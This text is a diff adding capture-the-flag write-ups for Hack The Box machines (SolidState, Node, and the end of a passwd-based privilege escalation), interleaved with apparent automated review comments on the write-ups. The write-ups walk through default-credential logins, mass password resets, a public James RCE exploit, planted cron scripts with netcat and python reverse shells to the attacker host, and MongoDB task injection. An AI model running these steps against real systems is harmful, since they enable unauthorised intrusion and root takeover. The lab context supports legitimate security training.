+ nihilist:$1$dkV9okB6$oRhhfakYp7/2QRZpsD0570/:0:0:nihilist:/root:/bin/bash
+ root2:$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/:0:0:root2:/root:/bin/bash
+
+
+Now that's done let's su as root2
+
+
+ www-data@apocalyst:/etc$ su root2
+ su root2
+ Password: 123
+
+ root@apocalyst:/etc# id
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+
+And that's it ! we have been able to log into the second root user we just created, effectively escalating privileges to the root permissions. now we just have to print our root flag :
+
+
+ root@apocalyst:/etc# cat /root/root.txt
+ cat /root/root.txt
+ 1cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
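Review bot: the finding that drives the whole privilege escalation is asserted but not shown: the text says LinEnum reported /etc/passwd, group, noprofile and shadow as writable, yet no LinEnum output or `ls -l /etc/passwd` line appears, and the `cat passwd` listing already contains two earlier `nihilist:$1$...:0:0:nihilist:/root:/bin/bash` entries that the write-up never explains. Include the line that establishes the world-writable file, and either drop the stale `nihilist` entries or say they are leftovers from previous attempts, otherwise a reader cannot tell which appended line is the one that worked. The shell in `nihilist.php` reads `bash -i > & /dev/tcp/10.10.14.11/9001 0>&1`; with the space, `> &` is not the `>&` redirection and bash rejects it as a syntax error, and the `<****?php` / `?****>` tags are escaping damage, so present the file in a fenced code block exactly as typed. The step between copying nihilist.php and "Once we have updated the 404.php page" is missing: say that the theme's 404.php is what gets replaced through the Appearance editor. "since python1 isn't there" should read "python" (the `which python` line returns nothing). The Rightiousness paragraph cites response sizes 421 and 440 from a dirbuster screenshot that is absent (the lone "` " line), so restore the image or paste the two result lines; the same empty embed follows the wp-login and 404.php steps. Minor: the attacker address changes from 10.10.14.7 in the nmap output to 10.10.14.11 everywhere else, and the `echo ... >> passwd` line lacks the echoed command that every other line in this non-tty shell shows, which suggests it was edited in by hand.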
diff --git a/Medium/12.md b/Medium/12.md
new file mode 100644
index 0000000..f8e8227
--- /dev/null
+++ b/Medium/12.md
@@ -0,0 +1,464 @@
+# SolidState Writeup
+
+
+
+## Introduction :
+
+Solidstate is a medium Linux box released back in September 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.51 --top-ports 50000 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 06:15 GMT
+ Initiating Ping Scan at 06:15
+ Scanning 10.10.10.51 [2 ports]
+ Completed Ping Scan at 06:15, 0.20s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 06:15
+ Completed Parallel DNS resolution of 1 host. at 06:15, 0.01s elapsed
+ DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+ Initiating Connect Scan at 06:15
+ Scanning 10.10.10.51 [8320 ports]
+ Discovered open port 22/tcp on 10.10.10.51
+ Discovered open port 25/tcp on 10.10.10.51
+ Discovered open port 80/tcp on 10.10.10.51
+ Discovered open port 110/tcp on 10.10.10.51
+ Increasing send delay for 10.10.10.51 from 0 to 5 due to max_successful_tryno increase to 4
+ Increasing send delay for 10.10.10.51 from 5 to 10 due to max_successful_tryno increase to 5
+ Discovered open port 119/tcp on 10.10.10.51
+ Connect Scan Timing: About 18.68% done; ETC: 06:18 (0:02:15 remaining)
+ Discovered open port 4555/tcp on 10.10.10.51
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p22,25,80,110,119,4555 10.10.10.51
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 06:17 GMT
+ Nmap scan report for 10.10.10.51
+ Host is up (0.23s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
+ | 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
+ |_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
+ 25/tcp open smtp JAMES smtpd 2.3.2
+ |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.11 [10.10.14.11]),
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ |_http-server-header: Apache/2.4.25 (Debian)
+ |_http-title: Home - Solid State Security
+ 110/tcp open pop3 JAMES pop3d 2.3.2
+ 119/tcp open nntp JAMES nntpd (posting ok)
+ 4555/tcp open james-admin JAMES Remote Admin 2.3.2
+ Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 26.99 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it :
+
+
+
+Browsing at the bottom we find an username : webadmin
+
+
+
+now let's dirsearch the website to see if we find anything interesting :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.51/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -e php,txt,html,js,xml
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, txt, html, js, xml | HTTP method: get | Threads: 50 | Wordlist size: 87646
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-03_06-21-26.log
+
+ Target: http://10.10.10.51/
+
+ [06:21:27] Starting:
+ [06:21:29] 301 - 311B - /images -> http://10.10.10.51/images/
+ [06:21:29] 200 - 8KB - /
+ [06:21:30] 301 - 311B - /assets -> http://10.10.10.51/assets/
+
+ Task Completed
+
+
+`  
+
+Doesn't seem like there's much on it, so let's investigate the port 4555 :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nc 10.10.10.51 4555
+ JAMES Remote Administration Tool 2.3.2
+ Please enter your login and password
+ Login id:
+ root
+
+ Password:
+ root
+
+ Welcome root. HELP for a list of commands
+ HELP
+
+ Currently implemented commands:
+ help display this help
+ listusers display existing accounts
+ countusers display the number of existing accounts
+ adduser [username] [password] add a new user
+ verify [username] verify if specified user exist
+ deluser [username] delete existing user
+ setpassword [username] [password] sets a user's password
+ setalias [user] [alias] locally forwards all email for 'user' to 'alias'
+ showalias [username] shows a user's current email alias
+ unsetalias [user] unsets an alias for 'user'
+ setforwarding [username] [emailaddress] forwards a user's email to another email address
+ showforwarding [username] shows a user's current email forwarding
+ unsetforwarding [username] removes a forward
+ user [repositoryname] change to another user repository
+ shutdown kills the current JVM (convenient when James is run as a daemon)
+ quit close connection
+
+
+trying out the default credentials (root:root) we log in as the root user now let's see what we have :
+
+
+ Welcome root. HELP for a list of commands
+ listusers
+ Existing accounts 5
+ user: james
+ user: thomas
+ user: john
+ user: mindy
+ user: mailadmin
+
+ setpassword james nihilist
+ Password for james reset
+
+ setpassword thomas nihilist
+ Password for thomas reset
+
+ setpassword john nihilist
+ Password for john reset
+
+ setpassword mindy nihilist
+ Password for mindy reset
+
+ setpassword mailadmin nihilist
+ Password for mailadmin reset
+
+
+We get a bunch of users so let's change their passwords to something easy to remember and investigate the pop3 service running on port 110 :
+
+
+ POP3:
+
+ USER user
+ PASS password
+ STAT
+ LIST
+ RETR nbmessage
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → telnet 10.10.10.51 110
+ Trying 10.10.10.51...
+ Connected to 10.10.10.51.
+ Escape character is '^]'.
+ +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
+ USER james
+ +OK
+ PASS nihilist
+ +OK Welcome james
+ STAT
+ +OK 0 0
+ LIST
+ +OK 0 0
+ .
+ RETR 1
+ -ERR Message (1) does not exist.
+
+
+Using telnet to access the POP3 service, we login as the james user but see that he doesn't have any interesting mail. so let's move on to the 2 interesting ones :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → telnet 10.10.10.51 110
+ Trying 10.10.10.51...
+ Connected to 10.10.10.51.
+ Escape character is '^]'.
+ +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
+ USER mindy
+ +OK
+ PASS nihilist
+ +OK Welcome mindy
+ STAT
+ +OK 2 1945
+ LIST
+ +OK 2 1945
+ 1 1109
+ 2 836
+ .
+ RETR 2
+ +OK Message follows
+ Return-Path: <****mailadmin@localhost>
+ Message-ID: <****16744123.2.1503422270399.JavaMail.root@solidstate>
+ MIME-Version: 1.0
+ Content-Type: text/plain; charset=us-ascii
+ Content-Transfer-Encoding: 7bit
+ Delivered-To: mindy@localhost
+ Received: from 192.168.11.142 ([192.168.11.142])
+ by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
+ for <****mindy@localhost>;
+ Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
+ Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
+ From: mailadmin@localhost
+ Subject: Your Access
+
+ Dear Mindy,
+
+
+ Here are your ssh credentials to access the system. Remember to reset your password after your first login.
+ Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
+
+ username: mindy
+ pass: P@55W0rd1!2@
+
+ Respectfully,
+ James
+
+ .
+
+and we get credentials ! mindy:P@55W0rd1!2@ , from there we'll just ssh as mindy :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → ssh mindy@10.10.10.51
+ The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
+ ECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.51' (ECDSA) to the list of known hosts.
+ mindy@10.10.10.51's password:
+ Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
+
+ The programs included with the Debian GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
+ mindy@solidstate:~$ id
+ -rbash: id: command not found
+ mindy@solidstate:~$ id
+ -rbash: id: command not found
+ mindy@solidstate:~$ whoami
+ -rbash: whoami: command not found
+ mindy@solidstate:~$ cat user.txt
+
+ 91XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Trying to privesc from a limited rbash shell is quite a pain so let's see if we can find another way in most notably using this exploit :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → searchsploit apache james 2.3
+ ----------------------------------------------------- -------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ----------------------------------------------------- -------------------------------
+ Apache James Server 2.3.2 - Remote Command Execution | exploits/linux/remote/35513.py
+ ----------------------------------------------------- -------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → locate 35513.py
+ /usr/share/exploitdb/exploits/linux/remote/35513.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → cp /usr/share/exploitdb/exploits/linux/remote/35513.py .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nano 35513.py
+
+
+Now we modify the exploit accordingly :
+
+ _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → python 35513.py 10.10.10.51
+ [+]Connecting to James Remote Administration Tool...
+ [+]Creating user...
+ [+]Connecting to James SMTP server...
+ [+]Sending payload...
+ [+]Done! Payload will be executed once somebody logs in.
+
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+
+
+
+Now to execute the payload (which is a reverse shell connection on our port 9002) we need to ssh into the machine.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → ssh mindy@10.10.10.51
+ mindy@10.10.10.51's password:
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.51] 39142
+ id
+ uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
+ which python
+ /usr/bin/python
+ python 'import pty;pty.spawn("/bin/bash")'
+ ls
+ bin
+ user.txt
+
+
+And we get an unrestricted shell ! now let's see which files may allow us to effectively privesc this box :
+
+
+ find / -user root -perm -002 -type f -not -path "/proc/*" 2>/dev/null
+ /opt/tmp.py
+ /sys/fs/cgroup/memory/cgroup.event_control
+
+ ls -lash /opt/tmp.py
+ 4.0K -rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
+
+ cat /opt/tmp.py
+ #!/usr/bin/env python
+ import os
+ import sys
+ try:
+ os.system('rm -r /tmp/* ')
+ except:
+ sys.exit()
+
+ nano /opt/tmp.py
+
+
+And we have a python script that has the 777 permissions ! This is a serious security issue as we're going to demonstrate :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → cd _HTB/SolidState
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nano tmp.py
+
+
+
+ #!/usr/bin/env python
+ import os
+ import sys
+ try:
+ os.system('/bin/nc -e /bin/bash 10.10.14.11 9003')
+ except:
+ sys.exit()
+
+
+now with this infected python script we make the machine download it in it's /tmp directory :
+
+_Terminal 1:_
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nc -lvnp 9003
+
+
+` _Terminal 3:_
+
+
+ cd /tmp
+
+ pwd
+ /tmp
+
+ which wget
+ /usr/bin/wget
+
+ wget http://10.10.14.11:8080/tmp.py
+
+ ls
+ tmp.py
+
+ cp tmp.py /opt/tmp.py
+
+ ls -lash /opt
+ total 16K
+ 4.0K drwxr-xr-x 3 root root 4.0K Aug 22 2017 .
+ 4.0K drwxr-xr-x 22 root root 4.0K Jun 18 2017 ..
+ 4.0K drwxr-xr-x 11 root root 4.0K Aug 22 2017 james-2.3.2
+ 4.0K -rwxrwxrwx 1 root root 128 Mar 3 14:07 tmp.py
+
+
+Now we wait a bit and we should catch the incoming reverse shell connection on our 9003 port once the cronjob executes the python script as the root user.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.51] 47682
+
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ cat /root/root.txt
+ b4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we recieved our reverse shell connection as root and we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
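Review bot: the `python 'import pty;pty.spawn("/bin/bash")'` line in the Terminal 2 listing after the 35513.py reverse shell is missing `-c`; as typed, python would try to open a script file with that name instead of running the one-liner, so it should read `python -c 'import pty;pty.spawn("/bin/bash")'`. Two more points in this hunk. "Now we modify the exploit accordingly" never shows which line of 35513.py was edited or what the payload was set to; since the rest of the section depends on that payload being a reverse shell to port 9002, quote the edited payload line so the step can be reproduced. Likewise "once the cronjob executes the python script as the root user" is asserted but nothing in the listing (no crontab, /etc/cron.* or process output) shows that /opt/tmp.py is scheduled at all, let alone as root; the only evidence shown is that the file is root-owned and world-writable in the `find / -user root -perm -002 -type f` output, so either add the cron enumeration output or soften the claim. Minor: "recieved" in the closing sentence should be "received".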
diff --git a/Medium/13.md b/Medium/13.md
new file mode 100644
index 0000000..94e50ed
--- /dev/null
+++ b/Medium/13.md
@@ -0,0 +1,921 @@
+# Node Writeup
+
+
+
+## Introduction :
+
+Node is a medium linux box released back in October 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.58 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 20:32 GMT
+ Nmap scan report for 10.10.10.58
+ Host is up (0.11s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 3000/tcp open ppp
+
+ Nmap done: 1 IP address (1 host up) scanned in 5.26 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap 10.10.10.58 -sCV -p22,3000 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 20:33 GMT
+ Nmap scan report for 10.10.10.58
+ Host is up (0.10s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
+ | 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
+ |_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
+ 3000/tcp open hadoop-datanode Apache Hadoop
+ | hadoop-datanode-info:
+ |_ Logs: /login
+ | hadoop-tasktracker-info:
+ |_ Logs: /login
+ |_http-title: MyPlace
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 16.12 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap port picked up a http service running on port 80, so let's try to investigate it with dirsearch/gobuster :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.51:3000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -e php,txt,html -x 200
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, txt, html | HTTP method: get | Threads: 50 | Wordlist size: 87646
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-03_20-40-22.log
+
+ Target: http://10.10.10.51:3000/
+
+ CONNECTION TIMEOUT: There was a problem in the request to:
+
+ Task Completed
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → gobuster dir --url http://10.10.10.58:3000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.58:3000/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/03/03 20:41:03 Starting gobuster
+ ===============================================================
+ Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.58:3000/faa34154-d721-4655-ac39-9224e8387b5c => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
+
+
+Right away we can see that this box may not be as easy as we think, because bruteforcing files on the website on port 3000 returns the same response (status 200) which basically means that we have nonexistant pages.
+
+
+
+SQL Injection doesn't seem to work here, but nonetheless pressing F12 > Debugger > we see that an angular JS script named profile.js is being used in assets/js/app/controllers/
+
+
+
+Being hinted towards /api/users/ we investigate :
+
+
+
+And we get a few usernames along with their hashes which can be easily identified with hash-identifier :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
+
+ Possible Hashs:
+ [+] SHA-256
+ [+] Haval-256
+
+ Least Possible Hashs:
+ [+] GOST R 34.11-94
+ [+] RipeMD-256
+ [+] SNEFRU-256
+ [+] SHA-256(HMAC)
+ [+] Haval-256(HMAC)
+ [+] RipeMD-256(HMAC)
+ [+] SNEFRU-256(HMAC)
+ [+] SHA-256(md5($pass))
+ [+] SHA-256(sha1($pass))
+ --------------------------------------------------
+
+
+So let's use hashcat to crack them with rockyou.txt, with the correct SHA-256 algorithm :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → hashcat -m 1400 -a 0 hashes /usr/share/wordlists/rockyou.txt
+ hashcat (v3.5.0) starting...
+
+ Dictionary cache hit:
+ * Filename..: rockyou.txt
+ * Passwords.: 14343296
+ * Bytes.....: 139921497
+ * Keyspace..: 14343296
+
+ f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
+ de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
+ dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
+
+
+And we get a list of credentals for us to use :
+
+
+ myP14ceAdm1nAcc0uNT manchester
+ tom spongebob
+ mark snowflake
+
+
+So we login as the admin account, and download the myplace.backup file for us to inspect it further :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → cd _HTB
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB]
+ → mkdir Node
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB]
+ → cd Node
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cp /home/nihilist/Downloads/myplace.backup .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file myplace.backup
+ myplace.backup: ASCII text, with very long lines, with no line terminators
+
+
+so we have some ascii text, but upon opening it we see that it may look like base64 so let's decode it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat myplace.backup | base64 -d > myplace
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file myplace
+ myplace: Zip archive data, at least v1.0 to extract
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → unzip myplace
+ Archive: myplace
+ creating: var/www/myplace/
+ [myplace] var/www/myplace/package-lock.json password:
+ password incorrect--reenter:
+ password incorrect--reenter:
+ skipping: var/www/myplace/package-lock.json incorrect password
+ creating: var/www/myplace/node_modules/
+ creating: var/www/myplace/node_modules/serve-static/
+ [myplace] var/www/myplace/node_modules/serve-static/README.md password:
+ password incorrect--reenter:
+
+
+And we get a zip archive ! although when we try to unzip it we need to give it a password , and our previous three passwords aren't working here. so let's use fcrackzip and rockyou.txt to try and guess the password :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup
+
+ PASSWORD FOUND!!!!: pw == magicword
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → unzip myplace
+ Archive: myplace
+ [myplace] var/www/myplace/package-lock.json password:
+
+
+So we unzip it and we have a bunch of files to work with, most notably /var/www/myplace/app.js :
+
+
+
+Which reveals mark's password : 5AYRft73VtFpc84k so let's ssh as mark :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ssh mark@10.10.10.58
+ The authenticity of host '10.10.10.58 (10.10.10.58)' can't be established.
+ ECDSA key fingerprint is SHA256:I0Y7EMtrkyc9Z/92jdhXQen2Y8Lar/oqcDNLHn28Hbs.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.58' (ECDSA) to the list of known hosts.
+ mark@10.10.10.58's password:
+
+ The programs included with the Ubuntu system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
+ applicable law.
+ .-.
+ .-'``(|||)
+ ,`\ \ `-`. 88 88
+ / \ '``-. ` 88 88
+ .-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
+ (:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
+ `-` ` , : 88 88 88 88 88 88 88 88 88 88 88
+ \ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
+ `./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
+ `-..-( )
+ `-`
+ The programs included with the Ubuntu system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
+ applicable law.
+
+ Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
+
+ mark@node:~$ id
+ uid=1001(mark) gid=1001(mark) groups=1001(mark)
+
+ mark@node:~$ cat /home
+ cat: /home: Is a directory
+
+ mark@node:~$ ls /home
+ frank mark tom
+
+ mark@node:~$ cat /home/mark/user.txt
+ cat: /home/mark/user.txt: No such file or directory
+ mark@node:~$ cat /home/frank/user.txt
+ cat: /home/frank/user.txt: No such file or directory
+ mark@node:~$ cat /home/tom/user.txt
+ cat: /home/tom/user.txt: Permission denied
+
+
+
+As you can see here, we are logged in as mark and we have 3 users to work with : frank, mark and tom. although we need to gain tom's privileges to be able to print the flag. so let's list tom's running processes :
+
+
+ mark@node:~$ ps -ef | grep tom
+ tom 1211 1 0 Mar03 ? 00:00:12 /usr/bin/node /var/www/myplace/app.js
+ tom 1221 1 0 Mar03 ? 00:00:07 /usr/bin/node /var/scheduler/app.js
+ mark 1600 1579 0 06:01 pts/0 00:00:00 grep --color=auto tom
+
+
+So let's investigate /var/scheduler/app.js :
+
+
+ mark@node:~$ cd /var/scheduler
+ mark@node:/var/scheduler$ cat app.js
+ const exec = require('child_process').exec;
+ const MongoClient = require('mongodb').MongoClient;
+ const ObjectID = require('mongodb').ObjectID;
+ const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource;=scheduler';
+
+ MongoClient.connect(url, function(error, db) {
+ if (error || !db) {
+ console.log('[!] Failed to connect to mongodb');
+ return;
+ }
+
+ setInterval(function () {
+ db.collection('tasks').find().toArray(function (error, docs) {
+ if (!error && docs) {
+ docs.forEach(function (doc) {
+ if (doc) {
+ console.log('Executing task ' + doc._id + '...');
+ exec(doc.cmd);
+ db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
+ }
+ });
+ }
+ else if (error) {
+ console.log('Something went wrong: ' + error);
+ }
+ });
+ }, 30000);
+
+ });
+
+
+And here we see the connection to the scheduler database, but what's ineresting is the setInterval function which will basically execute anything under the cmd value before deleting the doc from the collection. So let's log into the scheduler database as the user mark :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nano nihilist.sh
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat nihilist.sh
+ #!/bin/bash python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+
+
+ mark@node:/tmp$ wget 10.10.14.11:8080/nihilist.sh && chmod +x nihilist.sh
+ --2020-03-04 06:13:22-- http://10.10.14.11:8080/nihilist.sh
+ Connecting to 10.10.14.11:8080... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 240 [text/x-sh]
+ Saving to: ‘nihilist.sh’
+
+ nihilist.sh 100%[===============================================>] 240 --.-KB/s in 0s
+
+ 2020-03-04 06:13:23 (18.6 MB/s) - ‘nihilist.sh’ saved [240/240]
+
+
+
+
+ mark@node:/tmp$ mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
+ MongoDB shell version: 3.2.16
+ connecting to: localhost:27017/scheduler
+ > db.tasks.insert({"_id" : ObjectId("50e28180497eade7db1b7a5b"), "cmd" : "/tmp/nihilist.sh"})
+ WriteResult({ "nInserted" : 1 })
